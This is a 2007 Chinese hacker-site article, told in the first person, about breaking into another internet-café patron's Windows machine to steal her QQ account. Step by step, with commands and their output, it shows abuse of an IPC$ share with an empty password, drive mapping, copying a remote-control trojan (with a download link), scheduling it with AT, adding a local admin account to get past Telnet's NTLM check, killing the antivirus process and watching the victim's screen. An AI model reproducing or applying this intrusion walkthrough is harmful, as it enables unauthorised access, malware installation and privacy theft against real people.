文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 技术文摘 >> 安全防范 >> 文章内容  
 

 
亲身经验如何盗取QQ号

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
   好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧……

  在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化……

  这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了……

  无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..)

  打开偶可爱的CMD..先netname下看看本机情况

  WANGLU05

  USER2000

  命令成功完成。

  我本机名是WANGLU05.ping下看看IP有无什么规则

  Pingingwanglu05[192.168.0.13]with32bytesofdata:

  Replyfrom192.168.0.13:bytes=32time<10msTTL=64

  Replyfrom192.168.0.13:bytes=32time<10msTTL=64

  Replyfrom192.168.0.13:bytes=32time<10msTTL=64

  Replyfrom192.168.0.13:bytes=32time<10msTTL=64

  IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5.

  这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了.

  PingingWANGLU13[192.168.0.225]with32bytesofdata:

  Replyfrom192.168.0.225:bytes=32time<10msTTL=128

  Replyfrom192.168.0.225:bytes=32time<10msTTL=128

  Replyfrom192.168.0.225:bytes=32time<10msTTL=128

  得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手....

  netuse//192.168.0.225/ipc默认共享还在...

  只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子.

  G:/>netuse//192.168.0.225/ipc""/user:"user04"

  命令成功完成。


网吧系统盘为G盘.接着映射对方G盘为我本地Z盘.

  G:/>netusez://192.168.0.225/g

  命令成功完成。



  现在我的电脑里多了一个Z盘...图3.


  这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏....

  下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个

  web控制台.体积没多大,205KB..下面是关于webserver的介绍./../

  web控制台

  一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。

  可以在我网络盘里下到

  http://fhod.ys168.com

  综合工具里有个webserver.rar

  接着

  G:/>copywebserver.exe//192.168.0.225/admin

  已复制1个文件。

  G:/>nettime//192.168.0.225

  //192.168.0.225的当前时间是2005/2/5下午05:00

  命令成功完成。

  



用AT命令启动webserver.exe.

  2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用nettime查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了...

  FT....我说那.

  难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下..

  还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了...

  打开控制面板--管理工具--计算机管理

  操作-连接到另一计算机.

  然后输入IP192.168.0.225


图5

  呵.等一会就可以看到成功了...你看到了什么?

  更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务.


图6

  OK了...

  本地打开一cmd

  输入

  G:/>telnet192.168.0.225

  回车后出现

  ServerallowsNTLMauthenticationonly

  Serverhasclosedconnection


图7

  需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题.

  ntlm.exe在《流光》的Tools目录中有的...

  没工具怎么办呢..

  我们在本地添加一和远程主机同样的用户名

  输入

  netuseruser04/add添加user04密码为空的用户

  netlocalgroupadministratorsuser04/add把user04加入管理员组

  然后来到G:/Winnt/system32下找到CMD.exe

  右击.创建快捷方式.然后在快捷方式CMD右击..属性.

  在以其他用户身份运行前打勾...



  快捷方式CMD

  弹出窗口.在用户名处输入user04密码为空

  



  然后

  telnet192.168.0.225

  回车..哈哈...拿到shell了....

  接下来的事就好办了...去down了一个knlps命令行下杀进程的东东

  copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程

  这下把瑞星给关了.还怕他提示有毒

  接着执行webserver.exe

  在IE里输入

  192.168.0.225


图10

  看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天...

  好了她的QQ号码也拿到手了..加了她去聊聊去....

   -------------------------------------------------------------------------------------------
  上一篇:充QQ币的疯狂——宽带下的安全
  下一篇:教你找回被盗的QQ号码
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
P2P终结者使用教程
不怕攻击!上网必学的八招
亲身经验如何盗取QQ号
如何消灭键盘记录工具
QQ密码保护已忘记该怎样找
教你找回被盗的QQ号码
你的电脑有多安全?
学习从系统中删除病毒
让注册表对病毒说“不”
Apache+asp+php+cgi+jsp+m
被病毒蹂躏得不能打开杀毒
菜鸟QQ安全防患绝招之二
菜鸟QQ安全防患绝招之一
小心三类危险的TXT文件
你的QQ号和Q币是如何被盗
查明你的PC是否是僵尸计算
"灰鸽子"网页木马从原理,
新手注意 防止QQ密码被破
黑客通过IP欺骗进行攻击的
Windows服务器安全设置[详
三年不重装 令Windows百毒
弹出网页或不定时弹出网页
对付ARP Spoofing的一个备
网站被黑客入侵后我们该做
针对插入式木马的清除方法
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号